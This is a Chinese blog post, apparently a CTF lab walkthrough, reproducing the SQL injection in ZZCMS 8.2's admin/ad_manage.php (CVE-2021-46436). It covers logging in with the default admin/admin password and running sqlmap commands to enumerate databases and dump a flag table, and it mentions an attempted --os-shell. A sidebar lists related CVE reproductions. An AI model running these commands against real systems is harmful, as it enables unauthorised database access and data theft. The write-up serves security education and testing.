CVE-2021-46436

最新推荐文章于 2024-07-23 14:51:35 发布
最新推荐文章于 2024-07-23 14:51:35 发布
阅读量115 收藏
点赞数
分类专栏: CVE漏洞复现 文章标签: 网络安全 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51674437/article/details/131957291
版权
CVE-2021-46436

靶标介绍:

站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.2中在admin/ad_manage.php存在sql注入漏洞

得到目标后根据已知的

直接访问网址:http://xxx/admin/ad_manage.php ,跳转到登录窗口,弱口令:admin/admin 登录成功
在这里插入图片描述

继续访问:http://xxx/admin/ad_manage.php 网址,测试了添加广告和查询的功能,发现查询这里有输入参数,最可能存在SQL注入。因此我们直接随便输入值后进行抓包。
在这里插入图片描述

抓包后如图,将抓包的内容保存为1.txt 用sqlmap 跑出来即可
在这里插入图片描述

Sqlmap:

sqlmap.py -r 1.txt --random-agent --batch

在这里插入图片描述

可以尝试 --os-shellsql-shell 发现 --os-shell 没有写入的权限,因此我们拿不到webshell,所以flag 大概率会在数据库中,因此先查下数据库

sqlmap.py -r 1.txt --random-agent --batch --dbs

在这里插入图片描述

不存在ctf数据库,拿可能是在zzcms 当中,所以继续查看,这里已经跑出flag,确定flag 是再zzcms 当中,所以运行第二个把flag导出。这次的这个注入跑出来是延时注入,应该是一个个字符跑出来的,所以会比较慢。

sqlmap.py -r 1.txt --random-agent --batch -D zzcms --tables
sqlmap.py -r 1.txt --random-agent --batch -D zzcms -T flag --dump

在这里插入图片描述
最终跑出来的flag
在这里插入图片描述

Hxdih
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
任意文件下载漏洞(CVE-2021-44983)
Battery的博客
11-22 9万+
CVE-2021-44983是Taocms内容管理系统中的一个安全漏洞,可以追溯到版本3.0.1。该漏洞主要源于在登录后台后,文件管理栏存在任意文件下载漏洞。简言之,这个漏洞可能让攻击者通过特定的请求下载系统中的任意文件,包括但不限于敏感信息、配置文件等,从而可能导致系统被攻击或者数据泄露。
CVE-2021-26084
weixin_51387754的博客
09-23 2221
在 Confluence Server 和 Data Center 的受影响版本中,存在 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或数据中心实例上执行任意代码。受影响的版本分别为 6.13.23 之前的版本、7.4.11 之前的 6.14.0 版本、7.11.6 之前的 7.5.0 版本和 7.12.5 之前的 7.12.0 版本。 #!/usr/bin/env python3 # -*- encoding: utf-8 -*- """ @File :
CVE-2021-36934提权复现
good good study
01-31 1281
该漏洞由于Windows中多个系统文件的访问控制表(ACL)过于宽松,使得任何标准用户都可以从系统卷影副本中读取包括SAM、SYSETM、SECURITY在内的多个系统文件。得到用户的哈希值后,可以对其进行暴力破解,也可以直接使用本地管理员用户进行哈希传递,从而获取system权限。系统保护在windows系统中默认启动,因此如果已创建还原点,那么标准用户可直接从卷影副本中访问SAM、SYSETM、SECURITY文件。若系统中不曾创建过还原点,那么后面导出哈希时,ntlm哈希为。系统保护开启(默认开启)
CVE-2021-42287、CVE-2021-42278域内提权漏洞
good good study
05-09 2786
域内提权漏洞,CVE-2021-42287、CVE-2021-42278,只需一个普通域用户即可获取域控权限
CVE-2022-26965
qq_52309742的博客
04-19 123
会弹到初始页面,大概率是过滤了,百度搜了一下看,看了大多数上传的东西在/themes里面,开始猜路径,主题一般是文件名下的info.php,我上传的主题是info.zip,拼了一下路径果然返回一个白页面。看了无数个复现没get到,看了很多文章都是在info.php里做文章,于是构造一个info.php和zoe.php,并且打包成一个zip的压缩包。当时我不知道上传路径,用bp查看了一下返回包,没有看到上传的指定路径,但是有发现所有东西都在data/以后。尝试弱口令登录:admin,成功登录。
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8344
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
“微软蓝屏”事件暴露了网络安全哪些问题?
weixin_62595121的博客
07-22 1759
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。中国国际问题研究院助理研究员 谢卉:私营部门在技术发展和创新上处于前沿,拥有很大的主导权,但是他们现在和公共利益的联系也越来越紧密,因此要加强对私营部门的监管,让他们投资建设更为可靠的网络基础设施,减少由单点故障带来的风险。报道称,英国多家药店的支付功能也一度出现问题。
【网络安全科普】勒索病毒 防护指南
a38417的博客
07-20 1264
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
网络安全等级保护制度1.0与2.0的演进与变革
gmqqcsdn的博客
07-23 571
等保1.0是我国在网络安全领域迈出的重要一步,它于2008年正式发布。该版本的等保制度以《信息安全技术 信息系统安全等级保护基本要求》为核心标准,主要聚焦于信息系统的物理安全、网络安全、主机安全、应用安全和数据安全等方面的基础防护。等保1.0的实施对于提高我国信息系统的安全防护水平起到了积极的推动作用,但随着网络环境的快速变化和新型威胁的不断出现,等保1.0的局限性也逐渐显现。
2022 年中高职组“网络安全”赛项-海南省省竞赛任务书-1-B模块-B-4Web渗透测试
最新发布
轻舟已过万重山
07-23 166
通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020进行渗透测试,这里因为我们的Web服务器MySQL数据库版本原因,所以我换了台Web服务器,进行测试。将该场景中数据库的版本号作为 FLAG(例如:5.0.22)提交。换的这台Linux的服务器的IP为192。需要提交的flag:【
网络安全----web安全防范
weixin_55357256的博客
07-16 750
以下代码用来防范流行的DDoS攻击,ARP欺骗,CC攻击,XXS攻击,对输入的恶意代码进行过滤,嵌入到web程序可以很好的防范网络攻击,但如果想要更好的防范网络攻击,还需要更加复杂的配置和更硬核的硬件。print(f"可能的 CC 攻击针对资源 {resource} 检测到")# 用于检测 CC 攻击的函数(简单示例,通过监测短时间内对同一资源的请求频率)# 用于检测 XSS 攻击的函数(简单示例,检查输入中是否存在可疑脚本标签)# 用于检测 DDoS 攻击的函数(简单示例,通过监测短时间内的连接数量)
如何保护你的网络安全?
m0_70655343的博客
07-15 953
这项服务可以抵御复杂的网络威胁,即使在最强烈的攻击下也能保证您的网站服务如常,用户几乎无感知。此外,DDoS高防服务还具备网络应用程序防火墙(WAF),采用实时监控和机器学习来保护用户的资料,防止用户资料被盗,保护服务免遭未经授权的访问,降低个人数据泄露的风险,进而防止数字资产流失。为什么它这么重要呢?打个比方,这就像是你家车库的门开关出了问题,每次你按下按钮,车库门就不停地开关,直到电池耗尽。想象一下,你家的路由器被人利用来发起攻击,就像是你家的水龙头被打开,水不停地流向别人的房子,淹没了他们的院子。
网络安全-网络安全及其防护措施11
LS_Ai的博客
07-19 983
网络安全管理指通过制定策略、采取措施和使用工具,保护网络系统、设备和数据免受未经授权的访问、攻击和破坏。目标是确保网络的保密性、完整性和可用性,防止数据泄露和服务中断。虚拟私人网络(VPN)是一种通过公共网络(如互联网)建立加密通道,使得远程用户可以安全地访问私有网络资源和数据的技术。VPN通过加密和隧道技术保护数据的安全性和隐私性,同时允许用户在不同地理位置之间建立安全的连接。
CVE-2021-28041复现
03-13
CVE-2021-28041是一个安全漏洞,它影响了某个软件或系统的特定版本。由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值